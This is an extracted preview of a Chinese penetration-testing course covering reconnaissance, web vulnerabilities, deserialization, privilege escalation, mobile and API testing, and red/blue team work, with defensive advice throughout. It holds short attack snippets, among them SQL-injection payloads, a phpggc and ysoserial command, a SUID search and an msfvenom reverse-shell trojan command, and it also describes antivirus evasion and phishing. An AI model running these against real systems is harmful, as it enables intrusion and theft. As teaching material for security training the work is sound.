还剩28页未读,继续阅读
本资源只提供10页预览,全部文档请下载后查看!喜欢就下载吧,查找使用更方便
文本内容:
小迪安全课件版全面掌握2025网络攻防实战技能第一章网络安全基础与概念入门:网络安全的学习需要扎实的基础知识作为支撑本章将带你从核心概念入手,理解安全领域的专业术语、操作系统安全机制以及网络协议的运作原理这些基础知识是后续所有高级技术的根基,掌握它们将让你在实战中游刃有余网络安全核心名词解析POC与EXP概念Payload攻击载荷POCProof ofConcept是漏洞概念验证代码,用于证明漏洞存在但不造成实际危害Payload是攻击中真正执行恶意操作的代码部分,通常由编码器加密混淆以绕过安全检测常见EXPExploit则是完整的漏洞利用程序,可以实现具体攻击目标如获取权限或执行任意代码类型包括反弹Shell、正向连接、Meterpreter等,根据目标环境选择合适载荷至关重要后门与木马区别反弹Shell原理后门是预留的秘密访问通道,可以是代码漏洞或隐藏账户木马则伪装成正常程序诱使用户执反弹Shell是目标主机主动连接攻击者服务器,绕过防火墙出站限制通过Bash、Python、行,两者都用于持久化控制现代木马常采用免杀技术躲避杀毒软件检测Netcat等工具可实现,是内网渗透的关键技术黑盒测试vs白盒测试黑盒测试白盒测试•模拟外部攻击者视角,无源码访问权限•拥有完整源代码和系统架构文档•通过漏洞扫描、手工测试发现安全问题•通过代码审计深挖逻辑漏洞和安全隐患•适用于渗透测试、安全评估场景•适用于开发阶段的安全加固•时间成本较高但更贴近实战环境操作系统安全基础安全机制深度解析WindowsWindows系统内置多层防护体系,包括用户账户控制UAC、Windows Defender、防火墙以及ASLR/DEP内存保护机制UAC通过权限隔离防止未授权操作,攻击者常利用白名单程序或COM组件提权绕过Windows Defender基于行为检测和云查杀,免杀技术需要结合加壳、反射加载、进程注入等手段注册表和服务是Windows持久化的关键点,攻击者通过修改启动项、计划任务、DLL劫持实现隐蔽驻留PowerShell作为系统管理工具,同时也是攻击者最爱的无文件攻击载体,可执行内存马、远程下载恶意脚本安全加固与绕过技术LinuxLinux系统安全依赖权限管理、SELinux强制访问控制以及iptables防火墙SUID位程序、sudo配置错误、内核漏洞是提权的主要突破口攻击者通过搜索可写目录、定时任务、环境变量劫持等方式获取root权限防火墙绕过文件下载技巧权限维持利用代理隧道、协议封装、CDN中转等技术突在受限环境使用certutil、bitsadmin、curl、破防火墙限制,实现隐蔽通信wget等系统自带工具下载恶意文件网络协议与数据包基础协议深度剖析HTTP/HTTPSHTTP协议是Web应用的通信基础,理解其结构对漏洞挖掘至关重要请求由方法GET/POST、URI、协议版本、请求头、消息体构成,响应包含状态码、响应头和内容常见安全问题包括明文传输、缓存泄露、请求走私等HTTPS在HTTP基础上增加TLS/SSL加密层,通过证书验证服务器身份中间人攻击需要伪造证书或降级协议,抓包分析需要安装根证书信任SNI字段泄露域名信息,可用于CDN穿透关键请求头如Cookie承载会话令牌、User-Agent标识客户端、Referer记录来源页面、X-Forwarded-For传递真实IP响应头中的Set-Cookie、Content-Type、X-Frame-Options直接影响安全性抓包工具实战应用Wireshark Burp SuiteFiddler网络协议分析利器,支持数百种协议解析,过滤语法强Web调试代理工具,可拦截修改HTTP/HTTPS请求,大,可追踪TCP流、重组数据包,适合底层协议分析和支持断点、重放、压力测试,自动解密HTTPS,适合流量取证Web漏洞挖掘第二章信息收集与资产探测:信息收集是渗透测试的第一步,也是最重要的一步掌握的信息越多,攻击面越大,成功概率越高在渗透测试中,信息收集阶段决定了后续攻击的方向和深度本章将系统讲解如何绕过CDN定位真实服务器、利用搜索引擎挖掘敏感信息、使用自动化工具进行资产监控,以及识别目标系统的技术架构和潜在弱点绕过与真实获取技巧CDN IPCDN内容分发网络通过分布式节点加速访问并隐藏源站IP,给渗透测试带来挑战绕过CDN定位真实服务器是信息收集的关键环节,需要综合运用多种技术手段0102历史DNS记录查询子域名探测使用SecurityTrails、威胁情报平台查询域名历史解析记录,CDN部署前的IP可能仍是真实扫描目标的子域名如mail.、dev.、test.,这些子站点往往未接入CDN,直接解析到源站IP服务器0304全网扫描定位社会工程学手段使用Zmap、Masscan全网扫描443端口,通过证书CN字段或HTTP响应特征匹配真实服务通过邮件系统、RSS订阅、APP接口等服务触发源站主动连接,从而获取真实IP地址器实战工具集FuckcdnZmapWhois查询自动化CDN绕过工具,集成多种探测方法,支持批量检测,高速网络扫描器,可在45分钟内扫描全球IPv4地址空间,查询域名注册信息、DNS服务器,通过注册邮箱、服务商信输出可信度评分适合大规模资产发现息推测目标资产资产监控与漏洞探测网络空间测绘引擎应用Fofa、Shodan、Quake、ZoomEye等平台通过持续扫描互联网设备,建立全球资产指纹库掌握搜索语法可以精准定位特定系统、版本、组件,大幅提高漏洞挖掘效率Fofa高级语法Quake威胁情报Kunyu工具链支持title、header、body、cert等字段组合查360推出的网络空间测绘平台,集成漏洞情报、资产基于Fofa API的红队工具,可自动提取企业全量资询例如:body=powered bycountry=CN监控、威胁分析功能,支持API自动化调用产、识别Web框架、导出批量扫描目标列表port=8080可快速筛选国内特定CMS系统敏感信息泄露检测Git源码泄露SVN与备份文件开发人员误将.git目录上传至生产环境,攻击者可通过GitHack工具恢复完整源码检SVN版本控制系统的.svn目录、编辑器自动生成的.swp、数据库备份.sql、压缩测URL:http://target.com/.git/config包.zip/.rar等文件常包含敏感数据防御措施包括配置Web服务器禁止访问隐藏文件,使用.gitignore排除敏感文件,定期使用Dirsearch、御剑等工具扫描常见备份文件路径,也可通过.DS_Store文件遍历审计生产环境目录结构Mac系统上的目录结构架构与中间件安全Web企业级Web架构解析现代Web应用通常采用多层架构提升性能和安全性前端通过CDN加速静态资源,负载均衡器Nginx/HAProxy将流量分发到多台应用服务器,WAFWeb应用防火墙过滤恶意请求,应用服务器与数据库服务器物理隔离实现站库分离CDN层缓存静态资源,隐藏源站IP,提供DDoS防护WAF防护检测SQL注入、XSS等攻击,基于规则或AI识别威胁负载均衡分配请求流量,实现高可用和水平扩展应用服务器处理业务逻辑,运行Web框架和中间件数据库层存储持久化数据,主从复制保证可靠性常见中间件漏洞与防御中间件典型漏洞防御策略Apache解析漏洞、目录遍历、SSI注入升级到最新版本,禁用不必要模块,配置白名单后缀Nginx目录穿越、整数溢出、解析漏洞修复fastcgi_split配置,限制请求体大小Tomcat任意文件上传CVE-2017-
12615、反序列化禁用PUT方法,更新到安全版本,删除默认应用IIS短文件名泄露、PUT上传、解析漏洞禁用WebDAV,配置请求过滤,关闭目录浏览Weblogic反序列化RCE、任意文件上传、SSRF及时打补丁,删除console控制台,网络隔离第三章应用安全攻防:Web漏洞是渗透测试的Web核心战场Web应用层漏洞占据网络攻击的绝大部分,从经典的SQL注入、XSS到现代的反序列化、SSRF,攻防技术不断演进本章深入剖析各类Web漏洞的原理、利用手法和防御方案,通过真实案例演示如何发现并利用漏洞获取敏感数据或服务器权限我们将系统学习文件上传绕过技巧、跨站脚本攻击的多种变形、CSRF与SSRF的区别与联系,以及如何结合业务逻辑挖掘高危漏洞掌握这些技能后,你将具备独立完成Web渗透测试的能力注入全解析SQLSQL注入是Web安全最经典的漏洞类型,攻击者通过构造恶意SQL语句,绕过应用程序逻辑直接操作数据库危害包括数据泄露、权限提升、植入后门甚至控制服务器多数据库注入技巧对比MySQL注入Oracle注入MongoDB注入联合查询:UNION SELECT注释符号:--•NoSQL特性利用报错注入:updatexml字符串拼接:||•JSON查询绕过布尔盲注:AND1=1伪表:FROM dual$ne操作符注入时间盲注:SLEEP5报错函数:utl_inaddr$regex正则盲注堆叠查询:;DROP TABLE权限查询:DBA_TABLES•JavaScript代码执行高级注入技术实战盲注技术堆叠注入DNS带外注入当页面无回显时,通过布尔逻辑真假判断或时间延迟部分数据库如SQL Server支持一次执行多条语句,用通过load_file、UNC路径等函数触发DNS查询,将数sleep函数逐字符猜解数据自动化工具SQLmap支分号分隔可利用此特性执行DROP、UPDATE等危险据外带到攻击者控制的域名适用于无回显且时间盲注持多种盲注算法,可配合二分法提速操作,或调用xp_cmdshell执行系统命令被禁用的场景,需配合DNSlog平台接收数据防御建议:使用参数化查询PreparedStatement彻底杜绝SQL注入,避免拼接SQL字符串对用户输入进行严格过滤和转义,最小化数据库账户权限,部署WAF作为纵深防御文件上传漏洞与绕过文件上传功能若缺乏严格校验,攻击者可上传WebShell获取服务器控制权上传漏洞的利用需要绕过前端校验、MIME类型检测、文件扩展名过滤、内容检测等多重防护MIME类型欺骗前端校验绕过修改Content-Type为image/jpeg等白名单类型,配合文件头魔术字节如GIF89a混淆检测机制JavaScript校验可通过禁用JS、修改HTML代码、使用Burp抓包改包轻松绕过,不应作为唯一防线二次渲染攻击扩展名绕过技巧图片马被重新渲染后代码丢失,需在不被破坏的区域如EXIF注释写入Payload,或利用条件竞争在渲染利用黑名单不全phtml/php
5、大小写混淆AsP、双写绕过pphphp、截断攻击%
00、htaccess前访问解析等手法编辑器与CMS已知漏洞富文本编辑器漏洞CMS上传漏洞案例FCKeditor:历史版本存在任意文件上传,访问/editor/filemanager/connectors/test.html DedeCMS:会员中心头像上传,重命名绕过Kindeditor:JSON参数注入,可上传任意后缀文件WordPress:插件上传点多,版本差异大eWebEditor:默认数据库路径暴露,后台弱口令ThinkPHP:
5.x版本存在RCE,可直接GetShellUEditor:SSRF漏洞,可抓取内网文件Struts2:文件上传拦截器绕过免杀技巧:使用加密WebShell、反射调用、动态函数执行、无特征码马绕过安全软件将恶意代码分段存储在不同文件,运行时动态拼接执行跨站攻击深度剖析XSSXSS攻击类型与原理反射型XSS存储型XSS DOM型XSS恶意脚本通过URL参数传递,服务器未过滤直接输出到页面需恶意代码存储在数据库中,所有访问该页面的用户都会被攻击漏洞存在于客户端JavaScript代码,通过修改DOM环境执行攻诱使受害者点击构造的链接,常用于钓鱼攻击危害最大,常出现在留言板、评论区、个人资料等功能击服务器无法检测,需审计前端代码中的innerHTML、eval等危险函数示例:http://site.com/searchq=scriptalert1/script攻击链:提交恶意评论→存入数据库→其他用户浏览→触发脚本执行常见场景:document.writelocation.hashXSS绕过与利用技术编码绕过技术CSP策略绕过HTML实体编码:lt;scriptgt;Content-Security-Policy限制脚本来源,但存在绕过方法:URL编码:%3Cscript%3E•利用白名单中的JSONP接口Unicode编码:\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e•iframe配合sandbox属性十六进制编码:\x3cscript\x3e•利用CSP的unsafe-inline配置错误•Base64编码配合atob解码•通过Base标签改变相对路径多重编码组合可绕过正则过滤,需根据上下文选择编码方式•Service Worker劫持请求HttpOnly绕过与Cookie窃取HttpOnly标志防止JavaScript读取Cookie,但可通过以下手段绕过:利用XSS发起AJAX请求携带Cookie、通过CSRF攻击执行敏感操作、利用浏览器0day漏洞CVE-2012-0053Apache HttpOnly绕过、中间人攻击降级HTTPS窃取Cookie现代浏览器还存在Same-Site Cookie绕过技巧与攻击实战CSRF SSRFCSRF跨站请求伪造原理CSRF攻击利用用户已认证的会话,诱使其在不知情的情况下执行非预期操作攻击者构造恶意页面,包含指向目标站点的请求如转账、修改密码,受害者访问时浏览器自动携带Cookie完成攻击用户登录网站A浏览器发起请求浏览器保存认证Cookie自动携带网站A的Cookie1234访问攻击者网站B网站A执行操作页面包含恶意请求代码误认为是用户主动行为防御机制与绕过技术Token校验机制Referer同源策略服务器生成随机Token嵌入表单,提交时验证Token有效性攻击者无法预测Token值,CSRF攻击失败检查请求来源是否为可信域名,拒绝外部站点发起的请求绕过方法:利用XSS漏洞读取Token、子域名劫持、中间人攻击拦截Token、Token在URL中泄露Referer头绕过方法:在可信域名下找XSS或JSONP、利用浏览器不发送Referer的特性IE quirksmode、通过中间页面跳转清空RefererSSRF服务端请求伪造攻击SSRF诱使服务器向攻击者指定的目标发起请求,常用于探测内网、读取本地文件、攻击内网服务典型场景包括图片加载、网页抓取、Webhook回调、PDF生成等功能协议利用绕过技术无回显利用file://读取本地文件、dict://探测端口、gopher://发送任意TCP数据、IP地址进制转换、302跳转、短地址、DNS rebinding、IPv6地址通过DNSlog/HTTPlog平台接收数据、时间盲注探测端口、利用内网Redisftp://列目录写shell第四章代码审计与漏洞挖掘:从源码层面发现安全隐患代码审计是白盒测试的核心技能,通过分析源代码逻辑发现漏洞,相比黑盒测试能挖掘更深层次的安全问题本章重点讲解PHP和Java两大主流语言的常见漏洞模式,包括反序列化、代码注入、逻辑缺陷等我们将学习如何追踪危险函数调用链、分析MVC框架的安全机制、识别业务逻辑漏洞,并通过真实开源项目案例演示完整的审计流程掌握代码审计能力后,你可以在开发阶段就消除安全隐患,实现安全左移与反序列化漏洞PHP JavaPHP反序列化攻击原理PHP的unserialize函数将序列化字符串还原为对象,若未对输入进行过滤,攻击者可构造恶意序列化数据触发代码执行利用魔术方法__wakeup、__destruct、__toString等自动调用特性,构造POP链面向属性编程实现任意代码执行0102寻找反序列化入口发现可利用的类搜索unserialize函数调用点,检查输入是否可控查找包含危险函数的魔术方法,如__destruct中的eval0304构造POP链生成恶意Payload利用对象属性控制流,逐步触发漏洞函数执行序列化构造的对象,传入目标应用触发攻击Java反序列化RCEJava的ObjectInputStream.readObject存在类似风险Apache Commons Collections、FastJSON、Jackson等组件曾爆出多个反序列化漏洞,影响范围极广经典利用链:CommonsCollections:InvokerTransformer链,可调用任意方法执行Runtime.execFastJSON:autotype开关不当,可指定类名反序列化JdbcRowSetImpl加载恶意类Shiro:Remember-Me反序列化,硬编码AES密钥Log4j:JNDI注入,通过LDAP加载远程恶意类自动化工具与CVE绕过PHPGGC工具:PHP反序列化Payload生成器,内置数十种框架的利用链Laravel、Symfony、Yii2等,支持自定义Gadget链使用命令:phpggc Laravel/RCE1system id-bYsoserial工具:Java反序列化利用工具,集成常见组件的攻击链命令示例:java-jar ysoserial.jar CommonsCollections6calc|base64CVE绕过技巧:利用编码差异UTF-8/GBK、类名大小写不敏感、魔术方法调用顺序、Phar伪协议触发反序列化等手法绕过黑名单过滤和版本限制代码审计实战技巧危险函数与漏洞模式识别SQL注入审计文件包含漏洞搜索拼接SQL语句的代码,检查变量是否经过过滤关键函数:mysqli_query、检查include/require参数是否可控利用伪协议php://filter、data://读取源码PDO::query、executeQuery正则匹配:SELECT.*\$_GET|POST或执行代码防御需白名单限制文件路径命令执行审计代码执行漏洞审计system、exec、shell_exec、passthru等函数检查是否使用eval、assert、create_function、preg_replace/e修饰符可执行任意PHP代escapeshellarg过滤,注意管道符|、等命令连接符码动态函数调用$func也存在风险框架安全分析MVC现代框架虽内置安全机制,但配置不当或业务代码缺陷仍可能引入漏洞审计重点包括:路由与权限控制ORM安全问题•检查是否存在未授权访问的控制器方法•原生SQL查询是否存在注入风险•分析中间件Middleware是否正确应用•批量赋值Mass Assignment是否过滤敏感字段•测试路由参数污染和越权访问•关联查询是否可通过参数控制•审计RBAC权限判断逻辑是否严谨•SQL日志是否记录敏感信息审计流程建议:从敏感操作入口登录、支付、文件操作倒推代码流程,使用IDE全局搜索危险函数,结合黑盒测试验证漏洞可利用性,最后编写详细的安全报告业务逻辑漏洞识别业务逻辑漏洞源于设计缺陷而非代码错误,自动化工具难以发现,需要深入理解业务流程这类漏洞危害巨大,可能导致资金损失、数据泄露、权限绕过等严重后果常见业务逻辑漏洞类型水平越权访问用户A可以访问用户B的数据通过修改参数用户ID、订单号测试,查看是否校验所属关系案例:修改URL中的uid=123为uid=124查看他人信息垂直越权提权普通用户可执行管理员操作测试方法:抓取管理员请求,使用普通账号重放常见于角色切换、权限校验遗漏的功能点支付逻辑篡改修改支付金额、商品ID、折扣参数绕过校验使用Burp修改POST数据中的price、quantity字段,观察服务器是否重新计算总价验证码绕过验证码可重复使用、不过期、可爆破、可预测、前端校验测试:抓包删除验证码参数、重放同一验证码、高频请求测试限制实战案例:密码重置漏洞响应包篡改:修改返回的JSON中success:false为true跳过验证Token通用性:一个手机号的验证码可用于任意账号凭证未失效:重置密码的链接永久有效或可重复使用用户混淆:步骤1提交用户A,步骤2修改参数为用户B完成重置回传泄露:验证码或重置Token在响应包中直接返回挖掘技巧:关注多步骤流程注册、登录、支付、批量操作、优惠活动、积分系统等复杂业务使用不同权限账号对比测试,观察请求参数与业务逻辑是否一致第五章系统与服务安全:深入操作系统底层攻防获取Web权限后,下一步是提升为系统管理员权限并横向渗透内网本章聚焦操作系统层面的安全问题,包括数据库未授权访问、提权漏洞利用、中间件服务攻击以及协议层面的漏洞挖掘我们将实战演练Linux内核提权、Windows令牌窃取、数据库Getshell等高级技术,掌握从Web突破到系统完全控制的完整攻击链这些技能是红队渗透和应急响应人员的必备知识数据库安全与提权技术数据库未授权访问风险Redis未授权MySQL高权默认无密码监听6379端口,可写SSH公钥、crontab定时任务、webshell防御:设置requirepass密码,绑定
127.
0.
0.1,禁具有FILE权限可读写文件,通过INTO OUTFILE写shell、LOAD_FILE读配置提权利用UDF动态链接库执行系统命令、用危险命令MOF提权WindowsMongoDB暴露PostgreSQL提权早期版本默认无认证,27017端口直连可读写数据勒索软件曾大规模扫描删库勒索加固需启用auth、网络隔离、最小权利用COPY命令写文件、large object读取文件、创建扩展执行代码CVE-2019-9193可提权到postgres用户执行任意命限令Linux提权实战技术脏牛漏洞CVE-2016-5195SUID权限提升Linux内核内存子系统竞态条件漏洞,影响
2.
6.22-
4.
8.3所有版本利用Copy-On-Write机制,普通用户可修改只读文件,直接改查找具有SUID位的可执行文件:/etc/passwd添加root账户find/-perm-40002/dev/null利用脚本:dirty.c编译后执行,几秒内完成提权防御需升级内核版本可利用的SUID程序:•nmap--interactive旧版本•vim.tiny通过python执行命令•find-exec参数执行shell•自定义SUID程序的漏洞Windows提权技术Windows提权常用手法包括:令牌窃取Juicy Potato、内核漏洞利用MS17-010/永恒之蓝、服务配置不当unquoted servicepath、DLL劫持、AlwaysInstallElevated策略、计划任务权限、注册表AutoRun键值等工具如Metasploit、PowerUp.ps1可自动化检测提权向量中间件安全漏洞复现主流中间件CVE分析中间件CVE编号漏洞描述利用方法IIS CVE-2017-7269WebDAV远程代码执行利用Buffer Overflow执行ShellcodeApache CVE-2021-41773路径穿越与RCE构造/../cgi-bin/读取任意文件Tomcat CVE-2020-1938Ghostcat文件读取AJP协议8009端口读取配置文件Nginx CVE-2013-4547解析漏洞上传test.jpg空格.php绕过解析Weblogic CVE-2020-14882Console未授权RCE访问/console/css/%252e%252e/触发Weblogic T3协议反序列化Weblogic的T3协议用于集群通信,存在多个反序列化漏洞CVE-2015-
4852、CVE-2018-2628等攻击者向7001端口发送构造的序列化对象,触发代码执行利用工具:WeblogicScan、JRMP Client防御:禁用T3协议、升级补丁、部署Weblogic安全加固方案Jenkins与K8s容器安全Jenkins攻击面Kubernetes安全未授权访问:默认安装未启用认证,可直接创建任务执行命令API Server暴露:6443端口未授权可控制集群Groovy脚本:Script Console可执行任意代码Dashboard弱认证:Token泄露或跳过认证反序列化:CLI接口存在多个RCE漏洞容器逃逸:特权容器、挂载宿主机目录插件漏洞:Git、Pipeline等插件历史漏洞多Etcd数据泄露:2379端口存储敏感配置端口协议与桌面应用安全常见网络服务漏洞扫描SSH服务22端口RDP远程桌面3389端口弱口令爆破、私钥泄露、用户枚举、已知漏洞利用防御:禁用root登录、使用密钥认证、BlueKeep漏洞CVE-2019-
0708、弱密码登录、会话劫持Windows Server2003-2008系fail2ban防爆破、修改默认端口统高危,需及时打补丁FTP服务21端口SMB文件共享445端口匿名访问、目录遍历、未加密传输可能存在ProFTPD、vsFTPd的历史RCE漏洞,建议使用永恒之蓝MS17-
010、空会话枚举用户、IPC$未授权访问勒索病毒主要传播途径,高危端口SFTP替代需防火墙封禁桌面应用RCE攻击技术办公软件漏洞即时通讯工具Microsoft Office:公式编辑器漏洞CVE-2017-
11882、宏病毒、DDE攻击、OLE对象利用通过钓QQ/微信:接收文件自动执行、协议解析漏洞、图片渲染RCE鱼邮件传播恶意文档钉钉/企业微信:企业环境中横向移动的跳板,可能存在第三方插件漏洞WPS Office:加载项劫持、模板注入、历史版本存在任意代码执行漏洞中文用户基数大,APT常用攻防御建议:禁止陌生人文件、关闭自动预览、定期更新客户端版本击目标第六章移动端与安全:API移动互联网时代的新战场随着移动应用和微服务架构的普及,移动端与API安全成为新的攻防焦点本章深入剖析Android/iOS应用的逆向分析技术、微信小程序的安全隐患,以及RESTful API的常见漏洞我们将学习Frida动态插桩、证书绕过、算法还原等移动安全核心技能,掌握API接口的鉴权绕过、参数污染、越权访问等攻击手法这些知识对于移动应用开发者和安全测试人员都至关重要逆向与安全防护APPAndroid应用逆向分析流程加固与脱壳APK解包与反编译商业应用常使用
360、梆梆、爱加密等加固方案保护代码需使用FRIDA-DEXDump、Dumpdex等工具从内存dump原始dex,或使用apktool解包APK获取资源文件和smali代码,jadx反编译dex为Java代码查看AndroidManifest.xml分析组件、权限、入利用脱壳机口Activity动态调试与Hook关键逻辑定位使用Android Studio+debuggable应用调试,或通过Frida/Xposed hook关键函数,打印参数、修改返回值、绕过校验逻辑搜索关键字符串如登录成功、加密定位代码位置,追踪native方法调用,使用IDA Pro分析so库中的算法实现Frida与Xposed Hook技术Frida动态插桩Xposed框架Frida是跨平台的动态插桩框架,通过JavaScript注入进程,无需重新打包应用可Hook Java层、Native层、SSL Pinning等基于重打包的Hook方案,需要root权限可修改Android系统行为,劫持任意应用的方法调用常用场景:实用模块:•Hook登录验证函数修改返回值•JustTrustMe:绕过SSL证书校验•打印加密参数分析算法•SSLUnpinning:通用证书解绑•绕过Root检测和模拟器检测•VirtualXposed:无需root运行•导出内存中的密钥和敏感数据•EdXposed:支持高版本Android证书校验绕过与反代理防御应用通过SSL Pinning证书锁定防止中间人攻击和抓包分析攻击者可通过反编译修改校验代码、Frida Hook证书校验函数、修改系统证书库等方式绕过高级应用还会检测VPN、代理、调试器、Frida、Xposed等工具,通过多点校验、服务端校验、完整性检测构建纵深防御体系微信小程序安全小程序解包与反编译微信小程序本质是运行在微信容器中的前端应用,代码存储在手机本地,可通过以下步骤获取源码:123提取wxapkg包解包工具代码分析从使用unveilr、wxappUnpacker等工具解密解包,还原出wxml、查看app.js入口、页面逻辑、API调用,寻找硬编码密钥、接口地址、/data/data/com.tencent.mm/MicroMsg/{user}/appbrand/pkg/wxss、js文件逻辑漏洞目录找到.wxapkg文件小程序常见安全问题敏感信息泄露未授权访问源码中硬编码AppKey、AppSecret、数据库连接串、第三方API密钥应使用服务端配置管理,前端只获取临云开发数据库权限配置为所有用户可读写,导致数据泄露或篡改需配置精细的权限规则,验证用户身份时凭证业务逻辑绕过数据抓包分析前端校验可通过修改代码绕过,如支付金额、会员权限判断关键校验必须在服务端完成使用Charles、Fiddler配置代理抓取小程序HTTPS请求,分析接口参数、鉴权方式、加密算法主包分包与算法逆向小程序有2MB主包大小限制,超过部分会打包为分包subpackage逆向时需要获取所有分包才能看到完整代码算法逆向重点关注wx.request的参数生成逻辑,常见的sign签名、timestamp时间戳、nonce随机数等防重放机制开发建议:小程序代码是公开的,不要在前端实现关键业务逻辑使用云函数处理敏感操作,对API接口做严格的鉴权和参数校验,采用HTTPS加密传输接口安全攻防APIRESTful与SOAP接口差异RESTful APISOAP API基于HTTP协议的轻量级接口,使用JSON格式传输数据通过URL路径和HTTP方法基于XML的企业级接口协议,结构严格,支持WSDL服务描述常用于银行、政府等传统系统GET/POST/PUT/DELETE表达资源操作安全要点:安全要点:•WS-Security标准加密和签名•使用JWT或OAuth2进行鉴权•防止XML外部实体注入XXE•参数签名防止篡改•WSDL泄露可能暴露接口细节•限制请求频率防止暴力破解•SOAP消息体可能存在注入漏洞•避免在URL中暴露敏感信息API常见漏洞与检测方法鉴权绕过越权访问批量赋值攻击JWT密钥爆破、alg:none绕过、过期时修改用户ID、订单号等参数访问他人数POST请求中添加未公开的参数如间未校验、Token在URL中泄露使用据自动化工具Autorize可批量测试不isAdmin:true尝试提权需要结合源Burp的JSON WebToken插件自动化测同权限账号的API访问权限码或模糊测试发现隐藏字段试JWT漏洞阿里云KEY泄露与利用开发者误将阿里云AccessKey提交到GitHub等公开仓库,攻击者可利用该凭证访问云服务资源泄露的Key可能拥有ECS、RDS、OSS等服务的操作权限,导致数据泄露、资源滥用、挖矿等后果防御措施:使用RAM子账号最小权限原则、启用MFA多因素认证、定期轮换密钥、配置Git防泄露工具如git-secrets、使用临时STS令牌替代长期密钥第七章实战工具与攻防演练:工欲善其事必先利其器,渗透测试的效率很大程度取决于工具的熟练使用本章介绍Kali Linux渗透测试平台及其核心工具集,包括信息收集、漏洞扫描、漏洞利用、权限维持等各环节的专业工具我们还将讲解红蓝对抗演练的流程与思路,蓝队如何部署防御体系,红队如何绕过检测,以及应急响应中的日志分析、溯源取证技术这些实战经验将帮助你建立完整的攻防知识体系基础与渗透工具Kali LinuxKaliLinux核心工具集Nmap网络扫描Metasploit渗透框架端口扫描、服务识别、操作系统指纹常用命令:nmap-sV-sC-O target进行全面扫描支持NSE脚本扩展漏洞检测集成数千个漏洞利用模块,可生成木马、权限维持、横向移动msfconsole命令行界面功能强大,支持自定义模块开发SQLmap注入工具BurpSuite代理自动化SQL注入检测与利用,支持多种数据库和注入类型命令示例:sqlmap-u url--batch--dbs自动获取数据库列表Web渗透测试必备工具,拦截修改HTTP请求,自动化扫描漏洞,重放攻击,插件生态丰富专业版功能更强大Hashcat密码破解Aircrack-ng无线GPU加速的密码恢复工具,支持上百种哈希算法配合字典和掩码攻击可高效破解密码WiFi安全审计套件,可抓取握手包、破解WPA/WEP、伪造AP钓鱼需配合支持监听模式的无线网卡木马制作与钓鱼攻击Msfvenom木马生成社会工程学钓鱼使用Metasploit的载荷生成器创建木马:邮件钓鱼:伪造可信来源发送带恶意附件的邮件水坑攻击:在目标常访问的网站植入恶意代码msfvenom-p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=4444-f exeshell.exe钓鱼网站:克隆真实网站骗取账号密码USB投放:制作自动运行的恶意U盘可生成各种平台的木马Windows、Linux、Android,支持编码混淆免杀,输出格式包括exe、dll、apk、jar等工具:SETSocial-Engineer Toolkit、GoPhish钓鱼平台红蓝对抗与应急响应蓝队防御体系建设IDS/IPS部署蜜罐诱捕系统入侵检测系统监控异常流量,Snort、Suricata等开源方案基于规则匹配IPS可主动阻断攻击流量,但需避免误报影响业务部署仿真脆弱系统诱导攻击者,记录攻击手法和工具HoneyPot可布置SSH、Web、数据库等多种类型蜜罐,分析攻击趋势日志审计分析威胁情报运营集中收集系统、应用、网络设备日志,使用ELK Stack、Splunk等平台分析异常行为关键日志包括登录失败、权限变更、文件访问订阅威胁情报源,及时获取最新漏洞、攻击IP、恶意样本信息建立IOC入侵指标库,自动化匹配告警红队攻击流程与技巧侦察阶段信息收集、资产探测、漏洞扫描、社会工程学武器化构造Payload、定制木马、准备利用工具投递利用钓鱼邮件、水坑攻击、漏洞利用、暴力破解控制维持植入后门、权限提升、横向移动、持久化目标达成数据窃取、破坏系统、完成既定目标应急响应与溯源分析发现入侵事件后,应急响应流程包括:隔离失陷主机防止扩散、保留现场证据内存、磁盘镜像、日志、分析攻击手法和入侵路径、清除恶意文件和后门、修复漏洞加固系统、编写事件报告和处置建议日志分析技巧恶意样本分析•检查系统账户变化、sudo记录•静态分析:strings、PE工具查看字符串•分析Bash历史命令查看攻击行为•动态分析:沙箱运行观察行为•审计Web日志寻找注入、扫描特征•逆向工程:IDA Pro、Ghidra反汇编•检查计划任务、启动项异常•内存取证:Volatility分析内存镜像结语开启你的网络安全攻防之路:持续学习成就安全专家之路,恭喜你完成小迪安全课件2025版的全部学习!从网络安全基础概念到高级攻防技术,从Web漏洞挖掘到系统提权,从代码审计到应急响应,你已经建立了完整的安全知识体系职业发展方向建议入门级安全工程师掌握基础漏洞原理,能使用扫描工具发现常见安全问题,协助团队完成安全测试任务渗透测试工程师独立完成Web和系统渗透,具备漏洞挖掘能力,熟练使用各类攻防工具,编写测试报告安全研究员专注某个领域深入研究如0day挖掘、移动安全、二进制分析,发表安全文章和演讲红队攻防专家参与高级持续性威胁APT模拟,内网渗透,社会工程学,制定复杂攻击方案安全架构师设计企业安全体系,指导团队建设,结合业务制定安全策略,掌握攻防两端技术持续成长建议技术提升认证考试社区交流•关注CVE漏洞通告,复现最新漏洞•OSCP:进攻性安全认证专家•加入安全技术社区FreeBuf/先知•参与CTF竞赛锻炼实战能力•CEH:道德黑客认证•参加安全峰会BlackHat/Defcon•阅读优秀安全博客和论文•CISP:国家注册信息安全专业人员•贡献开源安全项目•搭建实验环境反复练习•CISSP:信息系统安全专家•建立个人技术博客•学习编程Python/Go提升自动化能力•云安全认证AWS/阿里云•与同行交流分享经验小迪安全寄语:网络安全是一场永无止境的攻防对抗,技术日新月异,唯有保持学习热情和好奇心,才能在这个领域持续成长希望本课程能成为你安全之路的起点,未来我们共同为网络空间安全贡献力量!。
个人认证
优秀文档
获得点赞 0